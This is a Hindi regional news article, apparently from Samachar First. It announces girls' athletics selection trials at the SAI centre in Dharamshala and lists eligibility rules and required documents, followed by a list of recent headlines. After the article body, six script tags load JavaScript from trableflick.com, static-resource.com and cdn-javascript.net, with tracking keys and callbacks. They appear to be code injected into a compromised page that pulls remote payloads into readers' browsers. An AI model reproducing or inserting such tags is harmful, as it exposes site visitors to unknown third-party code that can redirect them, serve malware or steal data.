Categories: हिमाचल

11 और 12 फरवरी को होंगे स्पोर्ट्स पर्सन के प्रवेश के लिए चयन परीक्षण

<p>भारतीय खेल प्राधिकरण, राष्ट्रीय उत्कृष्टता केन्द्र धर्मशाला में सत्र 2020-21 के लिए स्पोर्ट्स पर्सन (केवल लड़कियों के लिए) के लिए एथलेटिक्स (स्प्रिंट, मध्य और लंबी दूरी) के लिए चयन 11 औऱ 12 फरवरी, 2020 को भारतीय खेल प्राधिकरण, राष्ट्रीय उत्कृष्टता केन्द्र धर्मशाला में आयोजित होंगे। यह जानकारी देते हुए केन्द्र प्रभारी निर्मल कौर ने बताया कि चयन साई, एनसीओई मानदंडों के स्तर प्प्प्-बी के तहत होंगे। उन्होंने सभी प्रतिभागियों से आग्रह किया है कि वे 11 फरवरी को सुबह 9 बजे तक आयोजन स्थल पर पहुंच जाएं।</p>

<p>उन्होंने बताया कि चयन हेतु प्रतिभागियों को एथलेटिक्स (स्प्रिंट, मध्य और लंबी दूरी), आयु 1 अप्रैल, 2020 तक 15 से 25 साल औऱ एएफआई द्वारा आयोजित राष्ट्रीय प्रतियोगिताओं में प्रथम चार स्थान धारक या अखिल भारतीय अंतर विश्वविद्यालय/एस.जी.एफ.आई खेलों में प्रथम तीन स्थान धारक होना अनिवार्य है। प्रतिभागियों को जन्म प्रमाण पत्र, आधार कार्ड, खेल प्रमाण पत्र(प्रदर्शन मानदंड के अनुसार), मेडिकल फिटनेस प्रमाण पत्र, संस्थान से चरित्र प्रमाण पत्र, शिक्षा योग्यता प्रमाण पत्र तथा 5 पासपोर्ट आकार के फोटो साथ लाना अनिवार्य है।</p>

<p>चयनित प्रतिभागियों को सर्वोत्तम गुणवत्ता वाला बोर्डिंग, लॉजिंग, स्पोर्ट्स टेनिग, स्पोर्ट्स किट, प्रतियोगिता एक्सपोजर और चिकित्सा बीमा आदि सुविधाएं दी जाएंगी। चयन प्रक्रिया के दौरान उम्मीदवारों को कोई यात्रा भत्ता नहीं दिया जाएगा तथा खाने और ठहरने की व्यवस्था खुद से करनी होगी। अधिक जानकारी के लिए विभाग के दूरभाष नम्बर 01892-224807 पर सम्पर्क किया जा सकता है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_926061218&amp;key=21aca573d498d25317&amp;cv=1581330437&amp;t=1581330437767″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_296845602&amp;key=21aca573d498d25317&amp;cv=384805&amp;t=1581330437779″ type=”text/javascript”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1581330437803″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

दस साल से रेलवे लाइन का राग ही अलाप रहे अनुराग, मंजूरी तक नहीं दिला पाए : मुख्यमंत्री

नादौन: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने नादौन में पत्रकारों के साथ बातचीत में कहा…

8 hours ago

कांगड़ा-चंबा संसदीय क्षेत्र में 1910 मतदान केंद्र होंगे स्थापित: डीसी

धर्मशाला, 18 मई: रिर्टनिंग आफिसर कांगड़ा चंबा संसदीय क्षेत्र डीसी हेमराज बैरवा ने बताया कि…

8 hours ago

विवि के क्षेत्रीय केंद्र में निकाली मतदाता जागरूकता रैली

धर्मशाला, 18 मई: हिमाचल प्रदेश विश्वविद्यालय क्षेत्रीय केंद्र धर्मशाला में लोकसभा तथा विस उपचुनाव में…

8 hours ago

आगामी चुनावों में 5711969 मतदाता अपने मताधिकार का करेंगे प्रयोग: मनीष गर्ग

मुख्य निर्वाचन अधिकारी मनीष गर्ग ने आज यहां बताया कि भारत निर्वाचन आयोग द्वारा अनुमोदित…

8 hours ago

20 मई को टंग और बरवाला फीडर के अंतर्गत बिजली बंद

धर्मशाला, 18 मई: सहायत अभियंता विद्युत उपमंडल सिद्धपुर कर्मचंद भारती ने बताया कि 20 मई…

8 hours ago

ये जग्गी का नहीं, धर्मशाला की जनता का चुनाव, सरकार करेगी रुके हुए काम: बाली

कांग्रेस सरकार के साथ चलेगी धर्मशाला की जनता, जग्गी को MLA बनवाकर बढ़ेगा विकास का…

9 hours ago